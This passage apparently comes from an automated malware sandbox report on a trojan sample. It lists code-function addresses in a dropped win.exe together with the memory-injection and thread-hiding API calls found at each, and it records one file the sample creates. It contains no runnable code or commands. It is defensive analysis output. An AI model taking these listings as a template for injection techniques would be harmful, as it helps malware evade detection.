            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B5CE4 NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B60FA NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B28FE NtWriteVirtualMemory,LoadLibraryA,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B98F3 NtUnmapViewOfSection,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B4D2A NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B5D21 NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B4520 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B9933 NtUnmapViewOfSection,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B4948 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B5146 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B995D NtUnmapViewOfSection,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B9951 NtUnmapViewOfSection,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B996E NtUnmapViewOfSection,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B5D71 NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B4570 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B518F NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B4D83 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B4985 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B999B NtUnmapViewOfSection,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B5D90 NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B5DAD NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B45B5 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B51C7 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B4DE9 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B5DE9 NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B99E9 NtUnmapViewOfSection,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B45E0 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B45E4 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B45F9 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 16_2_020B49F4 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A9417 NtProtectVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A98CB LoadLibraryA,NtMapViewOfSection,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A0CBA D3DKMTSetStablePowerState,NtWriteVirtualMemory,TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A5CB3 NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A1D2E NtWriteVirtualMemory,LoadLibraryA,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4C68 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A506F NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4847 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A5023 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4C16 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A9C14 NtMapViewOfSection,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A60FA NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A28FE NtWriteVirtualMemory,LoadLibraryA,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A98F3 NtMapViewOfSection,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A48E3 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4CE4 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A5CE4 NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A98D8 NtMapViewOfSection,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A5CD9 NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A44CF NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A50C5 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4899 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4570 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A5D71 NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A996E NtMapViewOfSection,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A995D NtMapViewOfSection,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A9951 NtMapViewOfSection,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4948 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A5146 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A9933 NtMapViewOfSection,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4D2A NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4520 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A5D21 NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A45F9 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A49F4 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4DE9 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A5DE9 NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A99E9 NtMapViewOfSection,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A45E0 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A45E4 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A51C7 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A45B5 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A5DAD NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A999B NtMapViewOfSection,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A5D90 NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A518F NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4D83 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4985 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A7E78 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4A73 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A9A74 NtMapViewOfSection,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A9A57 NtMapViewOfSection,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A9A41 NtMapViewOfSection,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A5E47 NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4638 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A3E30 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A5230 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4E36 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A9A2F NtMapViewOfSection,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4A27 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A9A03 NtMapViewOfSection,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A9AEC NtMapViewOfSection,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A46D3 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A1ED7 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A5EA8 NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A9AAF NtMapViewOfSection,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4AA0 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4E99 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4694 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A9A95 NtMapViewOfSection,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A528D NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4A87 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4B5C NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A9B4B NtMapViewOfSection,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A2F3E NtWriteVirtualMemory,LoadLibraryA,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4B2D NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4B25 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4F14 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4B00 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A2B01 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A47F4 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A9BCB NtMapViewOfSection,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A93CD NtProtectVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4FB8 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A8BBE NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4BB0 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4797 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4F8C NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A9B83 NtMapViewOfSection,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B9417 NtProtectVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B0CBA D3DKMTSetStablePowerState,NtWriteVirtualMemory,TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B5CB3 NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B98CB LoadLibraryA,NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B1D2E NtWriteVirtualMemory,LoadLibraryA,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B9A03 NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B9A2F NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4A27 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4638 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B3E30 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B5230 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4E36 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B9A41 NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B5E47 NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B9A57 NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B7E78 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4A73 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B9A74 NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B528D NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4A87 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4E99 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B9A95 NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4694 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B5EA8 NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B9AAF NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4AA0 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B46D3 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B1ED7 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B9AEC NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B2B01 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4B00 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4F14 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4B2D NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4B25 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B2F3E NtWriteVirtualMemory,LoadLibraryA,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B9B4B NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4B5C NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4F8C NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B9B83 NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4797 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4FB8 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B8BBE NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4BB0 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B9BCB NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B93CD NtProtectVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B47F4 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4C16 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B9C14 NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B5023 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4847 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4C68 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B506F NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4899 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B44CF NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B50C5 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B5CD9 NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B98D8 NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B48E3 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4CE4 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B5CE4 NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B60FA NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B28FE NtWriteVirtualMemory,LoadLibraryA,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B98F3 NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4D2A NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B5D21 NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4520 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B9933 NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4948 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B5146 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B995D NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B9951 NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B996E NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B5D71 NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4570 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B518F NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4D83 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4985 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B999B NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B5D90 NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B5DAD NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B45B5 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B51C7 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4DE9 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B5DE9 NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B99E9 NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B45E0 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B45E4 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B45F9 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B49F4 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00569417 NtProtectVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_005698CB LoadLibraryA,NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00565CB3 NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00560CBA D3DKMTSetStablePowerState,NtProtectVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00569C14 NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_005698D8 NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00565CD9 NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_005698F3 NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00565CE4 NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00569951 NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_0056995D NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00565D71 NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_0056996E NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00569933 NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00565D21 NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00565DE9 NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_005699E9 NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00565D90 NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_0056999B NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00565DAD NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00569A57 NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00565E47 NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00569A41 NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00569A74 NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_0056166C NtProtectVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00561614 NtProtectVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_0056161B NtProtectVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00569A03 NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00569A2F NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_005616DF NtProtectVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00569AEC NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00569A95 NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00569AAF NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00565EA8 NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00569B4B NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_0056173C NtProtectVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_005693CD NtProtectVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00569BCB NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00569B83 NtSetInformationThread,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_005617B0 NtProtectVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_00569417 NtProtectVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_00565CB3 NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_00560CBA D3DKMTSetStablePowerState,NtProtectVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_00565CD9 NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_00565CE4 NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_00565D71 NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_00565D21 NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_00565DE9 NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_00565D90 NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_00565DAD NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_00565E47 NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_0056166C NtProtectVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_00561614 NtProtectVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_0056161B NtProtectVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_005616DF NtProtectVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_00565EA8 NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_0056173C NtProtectVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_005693CD NtProtectVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_005617B0 NtProtectVirtualMemory,
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeFile created: C:\Windows\Lwo7Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_0040DD8B
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B623F
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B0816
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B0CBA
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B5CB3
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B98CB
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B1D2E
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B1204
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B4A27
